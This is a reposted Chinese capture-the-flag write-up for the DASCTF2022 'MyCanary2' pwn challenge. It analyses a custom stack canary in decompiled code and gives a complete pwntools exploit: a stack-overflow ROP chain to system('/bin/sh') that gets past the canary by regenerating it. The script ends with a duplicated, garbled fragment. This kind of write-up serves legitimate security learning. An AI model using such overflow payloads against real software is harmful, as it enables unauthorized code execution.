ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

DASCTF2022七月赋能赛 MyCanary2

2022-07-28 01:31:06  阅读:218  来源: 互联网

标签:db 赋能赛 qword v2 DASCTF2022 io text 4040D0 MyCanary2


Analyse

  • sub_4012B6()
unsigned int sub_4012B6()
{
  int v0; // eax
  int fd; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  fd = open("/dev/urandom", 0);
  if ( fd == -1 )
  {
    printf("can't open /dev/urandom");
    exit(-1);
  }
  read(fd, &qword_4040D0, 8uLL);
  close(fd);
  v0 = time(0LL);
  srand(v0 ^ qword_4040D0);
  return alarm(0x14u);
}

这里通过time()时间戳和qword_4040D0作为seed,进行一个随机数的生成

  • sub_4013EC()
__int64 sub_4013EC()
{
  __int64 result; // rax
  char buf[88]; // [rsp+0h] [rbp-70h] BYREF
  __int64 v2; // [rsp+58h] [rbp-18h]
  int v3; // [rsp+68h] [rbp-8h]
  int v4; // [rsp+6Ch] [rbp-4h]

  v4 = 0;
  qword_4040D0 = (__int64)rand() << 32;
  qword_4040D0 += rand();
  v2 = qword_4040D0;
  puts("I have a secret. Can you find it?");
  while ( !v4 )
  {
    sub_401381();
    v3 = READ();
    switch ( v3 )
    {
      case 2:
        printf("My secret is %016lx\n", qword_4040D0);
        qword_4040D0 = (__int64)rand() << 32;
        qword_4040D0 += rand();
        v2 = qword_4040D0;
        printf("But now, I have a new Secret.");
        break;
      case 3:
        v4 = 1;
        break;
      case 1:
        puts("Show me the code:");
        read(0, buf, 0x100uLL);
        break;
    }
  }
  result = qword_4040D0;
  if ( v2 != qword_4040D0 )
  {
    printf("Hey, What are you doing?");
    exit(0);
  }
  return result;
}

case2:输出qword_4040D0,并且将rand()生成的随机数值左移运算32后赋给qword_4040D0,接着再加上一个随机数值,将qword_4040D0赋给v2,这个v2就起到一个canary的作用

case1:stackoverflow

程序退出前检查v2的值是否被改动过,如果与之前不等,则crash掉

.text:0000000000401573 ; __unwind {
.text:0000000000401573                 endbr64
.text:0000000000401577                 push    rbp
.text:0000000000401578                 mov     rbp, rsp
.text:000000000040157B                 lea     rdi, aBinSh     ; "/bin/sh"
.text:0000000000401582                 call    _system
.text:0000000000401587                 nop
.text:0000000000401588                 pop     rbp
.text:0000000000401589                 retn
.text:0000000000401589 ; } // starts at 401573

程序有后门函数,我们可以利用/bin/sh

-0000000000000070 buf             db 88 dup(?)
-0000000000000018 anonymous_0     dq ?              //v2
-0000000000000010                 db ? ; undefined
-000000000000000F                 db ? ; undefined
-000000000000000E                 db ? ; undefined
-000000000000000D                 db ? ; undefined
-000000000000000C                 db ? ; undefined
-000000000000000B                 db ? ; undefined
-000000000000000A                 db ? ; undefined
-0000000000000009                 db ? ; undefined
-0000000000000008 var_8           dd ?             //v4
-0000000000000004 var_4           dd ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

栈的一个分布,v2在buf的下方,我们在利用stackoverflow的时候会将v2覆盖掉,这样退出程序必然会crash

逻辑漏洞:如果我们先利用stackoverflow漏洞,ROP,调用system,构造system("/bin/sh"),再采用case2来生成canary,qword_4040D0的值会被赋给v2,这样虽然刚才v2被覆盖掉,但是现在已经是新生成的canary的值了,退出程序不会crash

刚拿到这道题的时候我在预测canary的值,没想到这么简单

exp

'''
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
'''
from pwn import *
import ctypes
context(os = "linux" , arch = "amd64" , log_level = "debug")
elf_path = "/mnt/c/Users/M1sceden4/Desktop/MyCanary2/tempdir/PWN附件/MyCanary2"
libc_func = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6")
local = int(input("0 for remote , 1 for local:\t"))
host = "node4.buuoj.cn"
port = 28118
if local == 1:
    io = process(elf_path)
elif local == 0:
    io = remote(host , port)
pop_rdi = 0x401613
ret = 0x40101a
elf = ELF(elf_path)
# io.recvuntil("Input your choice\n")
# io.sendline("2")
# io.recvuntil("My secret is ")
# qword_4040D0 = (io.recv(16)).decode()


# success("get qword_4040D0 : %s" % qword_4040D0)
# time = libc_func.time(0)

# libc_func.srand((time) ^ (qword_4040D0))
# new_secret = libc_func.rand() + (libc_func.rand() << 32)
# print(new_secret)
io.recvuntil("Input your choice\n")
io.sendline('1')
io.recvuntil("Show me the code:\n")
bin_sh = next(elf.search(b"/bin/sh"))
success('got binsh -> %s' % hex(bin_sh))
payload = b'a' * 0x68 + p32(1) + p32(0) + p64(0) + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(elf.plt['system'])

io.sendline(payload)
io.recvuntil("Input your choice\n")
io.sendline("2")
io.recvuntil("Input your choice\n")
io.sendline("3")
io.interactive()hoice\n")
io.sendline("3")
io.interactive()

标签:db,赋能赛,qword,v2,DASCTF2022,io,text,4040D0,MyCanary2
来源: https://www.cnblogs.com/m1nus/p/16527107.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有